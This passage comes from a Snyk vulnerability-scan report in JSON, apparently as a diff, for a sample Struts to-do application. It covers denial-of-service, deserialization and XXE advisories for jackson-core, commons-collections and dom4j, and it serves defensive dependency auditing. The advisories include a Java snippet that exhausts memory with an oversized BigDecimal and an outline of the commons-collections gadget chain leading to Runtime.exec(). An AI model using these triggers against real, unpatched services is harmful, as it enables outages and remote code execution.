to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-core` to version 2.8.6 or higher.\n## References\n- [GitHub PR](https://github.com/FasterXML/jackson-core/pull/322)\n- [Jira Issue](https://issues.jboss.org/browse/JBEAP-6316)\n", - "epssDetails": null, - "identifiers": { - "CVE": [], - "CWE": [ - "CWE-399" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-core", - "proprietary": false, - "creationTime": "2017-09-20T15:28:35.195000Z", - "functions_new": [ - { - "version": [ - "[,2.8.6)" - ], - "functionId": { - "className": "com.fasterxml.jackson.core.json.UTF8StreamJsonParser", - "functionName": "_reportInvalidToken" - } - }, - { - "version": [ - "[,2.8.6)" - ], - "functionId": { - "className": "com.fasterxml.jackson.core.json.ReaderBasedJsonParser", - "functionName": "_reportInvalidToken" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2017-01-12T00:00:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-core" - }, - "publicationTime": "2017-09-20T15:28:35Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-06T13:58:01.546686Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-core@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-core", - "version": "2.6.5", - "severityWithCritical": "medium" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31520", - "title": 
"Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "credit": [ - "gmethwin@github" - ], - "semver": { - "vulnerable": [ - "[2.3.0-rc1,2.7.7)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.7.7" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [ - { - "version": [ - "[2.3.0-rc1,2.7.7)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/core/json/UTF8JsonGenerator.java", - "className": "UTF8JsonGenerator", - "functionName": "writeNumber" - } - }, - { - "version": [ - "[2.3.0-rc1,2.7.7)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/core/json/WriterBasedJsonGenerator.java", - "className": "WriterBasedJsonGenerator", - "functionName": "writeNumber" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-core", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-core/commit/96642978dcf1b69cba68ec72cb2f652d59a8b5be", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-core/issues/315", - "title": "GitHub Issue" - } - ], - "cvssDetails": [], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:48.004490Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-core](https://github.com/FasterXML/jackson-core) is a Core Jackson abstractions, basic JSON streaming API implementation\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). 
When `WRITE_BIGDECIMAL_AS_PLAIN` setting is enabled, Jackson will attempt to write out the whole number, no matter how large the exponent.\r\nThe following sample code will trigger an out of memory exception:\r\n```java\r\nObjectMapper mapper = new ObjectMapper().enable(JsonGenerator.Feature.WRITE_BIGDECIMAL_AS_PLAIN);\r\nmapper.writeValueAsString(new java.math.BigDecimal(\"9.223372E+1010671858\"));\r\n```\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-core` to version 2.7.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-core/commit/96642978dcf1b69cba68ec72cb2f652d59a8b5be)\n- [GitHub Issue](https://github.com/FasterXML/jackson-core/issues/315)\n", - "epssDetails": null, - "identifiers": { - "CVE": [], - "CWE": [ - "CWE-399" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-core", - "proprietary": false, - "creationTime": "2017-09-20T15:28:35.195000Z", - "functions_new": [ - { - "version": [ - "[2.3.0-rc1,2.7.7)" - ], - "functionId": { - "className": "com.fasterxml.jackson.core.json.UTF8JsonGenerator", - "functionName": "writeNumber" - } - }, - { - "version": [ - "[2.3.0-rc1,2.7.7)" - ], - "functionId": { - "className": "com.fasterxml.jackson.core.json.WriterBasedJsonGenerator", - "functionName": "writeNumber" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2016-08-25T00:00:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-core" - }, - "publicationTime": "2017-09-20T15:28:35Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-06T13:55:48.004490Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-core@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-core", - "version": "2.6.5", - "severityWithCritical": "medium" - }, - { - "id": 
"SNYK-JAVA-COMMONSCOLLECTIONS-30078", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[3.0,3.2.2)" - ] - }, - "exploit": "High", - "fixedIn": [ - "3.2.2" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "critical", - "cvssScore": 9.8, - "functions": [ - { - "version": [ - "[3,3.2.2)" - ], - "functionId": { - "filePath": "org/apache/commons/collections/functors/InvokerTransformer.java", - "className": "InvokerTransformer", - "functionName": "transform" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "commons-collections:commons-collections", - "references": [ - { - "url": "http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/", - "title": "FoxGloveSecurity Blog" - }, - { - "url": "https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611", - "title": "GitHub Commit" - }, - { - "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580", - "title": "Jira Issue" - }, - { - "url": "https://github.com/ianxtianxt/CVE-2015-7501", - "title": "PoC" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:46:27.924934Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 7.3, - "modificationTime": "2024-03-11T09:52:38.421377Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O", - "assigner": "Snyk", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:09:40.078866Z" - }, - { - 
"type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:46:27.924934Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:52:38.421377Z" - } - ], - "description": "## Overview\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to execute arbitrary Java code with the `InvokerTransformer` serializable collections . The `sun.reflect.annotation.AnnotationInvocationHandler#readObject` method invokes `#entrySet` and `#get` on a deserialized collection. If an attacker has to ability to send serialized data (JMX, RMI, EJB) to an application using the `common-collections` library, it is possible to combine the aforementioned methods to execute arbitrary code on the application.\r\n\r\n\r\n`org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4`. We recommend moving to the new artifact if possible.\n\n**NOTE:** \r\n\r\nThis vulnerability has also been identified as: [CVE-2015-4852](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-6056408)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. 
Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. 
By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n## References\n- [FoxGloveSecurity Blog](http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/)\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611)\n- [Jira Issue](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n- [PoC](https://github.com/ianxtianxt/CVE-2015-7501)\n", - "epssDetails": { - "percentile": "0.88407", - "probability": "0.01844", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2015-7501" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "commons-collections:commons-collections", - "proprietary": false, - "creationTime": "2016-12-25T16:51:56Z", - "functions_new": [ - { - "version": [ - "[3,3.2.2)" - ], - "functionId": { - "className": "org.apache.commons.collections.functors.InvokerTransformer", - "functionName": "transform" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2015-11-06T16:51:56Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "High", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "commons-collections", - "artifactId": "commons-collections" - }, - "publicationTime": "2015-11-06T16:51:56Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:52:38.421377Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - 
"io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "commons-collections:commons-collections@3.1" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "commons-collections:commons-collections", - "version": "3.1", - "severityWithCritical": "critical" - }, - { - "id": "SNYK-JAVA-COMMONSCOLLECTIONS-472711", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:R", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,3.2.2)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "3.2.2" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.6, - "functions": [ - { - "version": [ - "[3.1, 3.22)", - "[,3.0-dev2)" - ], - "functionId": { - "filePath": "org/apache/commons/collections/functors/InvokerTransformer.java", - "className": "InvokerTransformer", - "functionName": "" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "commons-collections:commons-collections", - "references": [ - { - "url": "https://github.com/apache/commons-collections/commit/5ec476b0b756852db865b2e442180f091f8209ee", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/apache/commons-collections/pull/18", - "title": "GitHub PR" - }, - { - "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580", - "title": "Jira Ticket" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 7.3, - "modificationTime": "2024-03-11T09:52:35.761152Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:R", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.6, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:03:34.698666Z" - }, - { - "type": 
"secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:52:35.761152Z" - } - ], - "description": "## Overview\n\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data.\nVersions of commons-collections prior to `3.2.2` do not prevent deserialization of the class `org.apache.commons.collections.functors.InvokerTransformer`. This could be leveraged by an attacker as a gadget within a vulnerable application which deserializes user input to execute arbitrary code. \r\n\r\nVersions of commons-collections from 3.2.2 onwards will throw an `UnsupportedOperationException` error when attempts are made to deserialize InvokerTransformer instances to prevent potential remote code execution exploits.\r\n\r\n*Note:* `org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4` we recommend moving to the new artifact if possible.\r\n\r\n## PoC \r\n\r\n```\r\n/*\r\n\tGadget 
chain:\r\n\t\tObjectInputStream.readObject()\r\n\t\t\tAnnotationInvocationHandler.readObject()\r\n\t\t\t\tMap(Proxy).entrySet()\r\n\t\t\t\t\tAnnotationInvocationHandler.invoke()\r\n\t\t\t\t\t\tLazyMap.get()\r\n\t\t\t\t\t\t\tChainedTransformer.transform()\r\n\t\t\t\t\t\t\t\tConstantTransformer.transform()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tClass.getMethod()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tRuntime.getRuntime()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tRuntime.exec()\r\n\tRequires:\r\n\t\tcommons-collections\r\n */\r\n```\n\n## Details\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\r\n\r\n \r\n\r\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\r\n\r\n \r\n\r\nJava deserialization issues have been known for years. 
However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\r\n\r\n \r\n\r\nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\r\n\r\n \r\n\r\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\r\n\r\n- Apache Blog\r\n\r\n \r\n\r\nThe vulnerability, also know as _Mad Gadget_\r\n\r\n> Mad Gadget is one of the most pernicious vulnerabilities we’ve seen. By merely existing on the Java classpath, seven “gadget” classes in Apache Commons Collections (versions 3.0, 3.1, 3.2, 3.2.1, and 4.0) make object deserialization for the entire JVM process Turing complete with an exec function. 
Since many business applications use object deserialization to send messages across the network, it would be like hiring a bank teller who was trained to hand over all the money in the vault if asked to do so politely, and then entrusting that teller with the key. The only thing that would keep a bank safe in such a circumstance is that most people wouldn’t consider asking such a question.\r\n\r\n- Google\n\n\n## Remediation\n\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n\n\n## References\n\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/5ec476b0b756852db865b2e442180f091f8209ee)\n\n- [GitHub PR](https://github.com/apache/commons-collections/pull/18)\n\n- [Jira Ticket](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n", - "epssDetails": { - "percentile": "0.82603", - "probability": "0.00880", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2015-6420" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-6hgm-866r-3cjv" - ] - }, - "packageName": "commons-collections:commons-collections", - "proprietary": false, - "creationTime": "2019-10-10T18:31:03.943542Z", - "functions_new": [ - { - "version": [ - "[3.1, 3.22)", - "[,3.0-dev2)" - ], - "functionId": { - "className": "org.apache.commons.collections.functors.InvokerTransformer", - "functionName": "" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2019-10-10T00:00:00Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "commons-collections", - "artifactId": "commons-collections" - }, - "publicationTime": "2020-02-24T00:00:00Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:52:35.761152Z", - "socialTrendAlert": false, - 
"packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "commons-collections:commons-collections@3.1" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "commons-collections:commons-collections", - "version": "3.1", - "severityWithCritical": "medium" - }, - { - "id": "SNYK-JAVA-COMMONSCOLLECTIONS-6056408", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[3.0,3.2.2)" - ] - }, - "exploit": "High", - "fixedIn": [ - "3.2.2" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "critical", - "cvssScore": 9.8, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "commons-collections:commons-collections", - "references": [ - { - "url": "http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/", - "title": "FoxGloveSecurity Blog" - }, - { - "url": "https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611", - "title": "GitHub Commit" - }, - { - "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580", - "title": "Jira Issue" - }, - { - "url": "https://github.com/ianxtianxt/CVE-2015-7501", - "title": "PoC" - }, - { - "url": "https://www.exploit-db.com/exploits/46628", - "title": "Exploit DB" - }, - { - "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", - "title": "CISA - Known Exploited Vulnerabilities" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:54:13.273677Z" - } - ], - "cvssSources": [ 
- { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O", - "assigner": "Snyk", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:09:40.088365Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:54:13.273677Z" - } - ], - "description": "## Overview\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to execute arbitrary Java code with the `InvokerTransformer` serializable collections . The `sun.reflect.annotation.AnnotationInvocationHandler#readObject` method invokes `#entrySet` and `#get` on a deserialized collection. If an attacker has to ability to send serialized data (JMX, RMI, EJB) to an application using the `common-collections` library, it is possible to combine the aforementioned methods to execute arbitrary code on the application.\r\n\r\n`org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4`. We recommend moving to the new artifact if possible.\n\n**NOTE:** \r\n\r\nThis vulnerability has also been identified as: [CVE-2015-7501](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. 
Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. 
By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n## References\n- [FoxGloveSecurity Blog](http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/)\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611)\n- [Jira Issue](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n- [PoC](https://github.com/ianxtianxt/CVE-2015-7501)\n- [Exploit DB](https://www.exploit-db.com/exploits/46628)\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n", - "epssDetails": { - "percentile": "0.99663", - "probability": "0.96725", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2015-4852" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "commons-collections:commons-collections", - "proprietary": false, - "creationTime": "2023-11-14T13:41:26.946764Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2015-11-06T16:51:56Z", - "exploitDetails": { - "sources": [ - "CISA", - "ExploitDB", - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "High", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Attacked", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "commons-collections", - "artifactId": "commons-collections" - }, - "publicationTime": "2015-11-06T16:51:56Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-06-03T08:53:26.834525Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - 
"io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "commons-collections:commons-collections@3.1" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "commons-collections:commons-collections", - "version": "3.1", - "severityWithCritical": "critical" - }, - { - "id": "SNYK-JAVA-DOM4J-174153", - "title": "XML External Entity (XXE) Injection", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:P", - "credit": [ - "Mario Areias" - ], - "semver": { - "vulnerable": [ - "[0,]" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.5, - "functions": [ - { - "version": [ - "[0,]" - ], - "functionId": { - "filePath": "org/dom4j/Namespace.java", - "className": "Namespace", - "functionName": "" - } - }, - { - "version": [ - "[0,]" - ], - "functionId": { - "filePath": "org/dom4j/QName.java", - "className": "QName", - "functionName": "" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "dom4j:dom4j", - "references": [ - { - "url": "https://github.com/dom4j/dom4j/commit/e598eb43d418744c4dbf62f647dd2381c9ce9387", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/dom4j/dom4j/issues/48", - "title": "GitHub Issue" - }, - { - "url": 